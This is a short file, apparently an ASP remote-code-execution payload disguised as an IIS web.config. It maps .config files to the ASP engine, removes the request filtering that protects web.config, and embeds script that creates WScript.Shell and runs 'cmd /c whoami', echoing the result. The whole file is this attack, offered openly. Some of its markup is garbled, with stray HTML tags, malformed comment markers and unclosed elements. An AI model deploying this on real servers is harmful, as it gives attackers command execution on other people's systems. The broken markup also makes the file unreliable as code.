test-asp-RCE

1. <?xml version="1.0" encoding="UTF-8"?>
2. <configuration>
3.     <system.webServer>
4.         <handlers accessPolicy="Read, Script, Write">
5.         <add name="web_config" path="*.config" verb="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64"\>
6.         </handlers>
7.  
8.         <security>
9.             <requestFiltering>
10.                 <fileExtensions>
11.                     <remove fileExtension=".config"/>
12.                 </fileExtensions>
13.                 <hiddenSegments>
14.                     <remove segment="web.config"/>
15.                 </hiddenSegments>
16.             <requestFiltering>
17.         </security>
18.     </system.webServer>
19.     <appSettings>
20.     </appSettings>
21. </configuration>
22.  
23. <!-
24. <% Response.write("-" & "->")
25. Response.write("</p>
26. <pre>")</p>
27. <p>Set oScript = Server.CreateObject("WSCRIPT.SHELL")
28. Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK")
29. Set oFileSys = Server.CreateObject("Scripting.FileSystemObject")
30. Function getCommandOutput(theCommand)
31. Dim objShell, objCmdExec
32. Set objShell = CreateObject("WScript.Shell")
33. Set objCmdExec = objshell.exec(thecommand)
34. getCommandOutput = objCmdExec.StdOut.ReadAll
35. end Function</p>
36.  
37. <p>Response.write(getCommandOutput('cmd /c whoami'))
38. Response.write("</pre>
39. </p><!-" & "-")%>
40. ->